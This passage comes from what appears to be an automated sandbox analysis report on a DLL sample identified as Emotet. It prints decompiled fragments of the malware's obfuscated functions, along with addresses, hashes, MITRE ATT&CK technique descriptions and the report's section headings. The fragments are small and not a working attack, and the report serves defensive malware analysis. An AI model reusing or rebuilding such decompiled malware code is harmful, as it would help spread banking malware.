				_v16 = _v16 + 0xffff5a50;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000f59f5;
				_v8 = 0xa57c1a;
				_v8 = _v8 | 0x119c25df;
				_v8 = _v8 + 0xffffdcc6;
				_t72 = 0x4f;
				_v8 = _v8 / _t72;
				_v8 = _v8 ^ 0x003b1570;
				E003DE399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
				_t68 = lstrcmpiW(_a8, _t81); // executed
				return _t68;
			}

0x003d020f
0x003d0212
0x003d0214
0x003d0217
0x003d021a
0x003d021d
0x003d021f
0x003d0224
0x003d0232
0x003d0235
0x003d0238
0x003d0239
0x003d023a
0x003d0246
0x003d0247
0x003d024c
0x003d0250
0x003d0257
0x003d025e
0x003d0265
0x003d0269
0x003d0270
0x003d0277
0x003d0285
0x003d028a
0x003d0291
0x003d0298
0x003d029f
0x003d02a9
0x003d02af
0x003d02b2
0x003d02d5
0x003d02e1
0x003d02e8

APIs

lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 003D02E1

Strings

(Gt, xrefs: 003D025E

Memory Dump Source

Source File: 00000005.00000002.598782764.00000000003C0000.00000040.00000010.sdmp, Offset: 003C0000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID: (Gt
API String ID: 1586166983-558867117
Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction ID: 8021724e4a06314cb1e558f66d04333a6f1a8020d9213fa6c0cd4af8994eafc3
Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction Fuzzy Hash: E92166B6E00208FBEF04DFA4CC0A9DEBBB2FB44314F108199E515AA250D7B65A10DF90

Uniqueness

Uniqueness Score: -1.00%

Function 003CF3F7, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E003CF3F7() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t47;

				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xb0bfd;
				_v32 = 0x231de0;
				_v20 = 0x822c7a;
				_t47 = 0x31;
				_push(_t47);
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x12d3a120;
				_v12 = 0x122796;
				_v12 = _v12 | 0x5fffe7f7;
				_v12 = _v12 ^ 0x5ff36a5b;
				_v8 = 0xc53dc4;
				_v8 = _v8 + 0xffff669e;
				_v8 = _v8 + 0xba03;
				_v8 = _v8 + 0x1f9e;
				_v8 = _v8 ^ 0x00c2122b;
				_v16 = 0x5857ad;
				_v16 = _v16 / _t47;
				_v16 = _v16 ^ 0x000b8ebe;
				E003DE399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
				ExitProcess(0);
			}

0x003cf3fd
0x003cf403
0x003cf407
0x003cf40e
0x003cf415
0x003cf422
0x003cf423
0x003cf429
0x003cf42c
0x003cf433
0x003cf43a
0x003cf441
0x003cf448
0x003cf44f
0x003cf456
0x003cf45d
0x003cf464
0x003cf46b
0x003cf479
0x003cf47c
0x003cf495
0x003cf49f

APIs

ExitProcess.KERNEL32(00000000), ref: 003CF49F

Memory Dump Source

Source File: 00000005.00000002.598782764.00000000003C0000.00000040.00000010.sdmp, Offset: 003C0000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction ID: e0a24b636ead0c59a5dd7492eaf36eaf21d3646a61ec3a34c4ebe5f239007b18
Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction Fuzzy Hash: 891106B1E1021DEBDF04DFE4D94A6EEBBB4FB14315F108188E521AA240E7B45B548F80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 6zAcNlJXo7.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior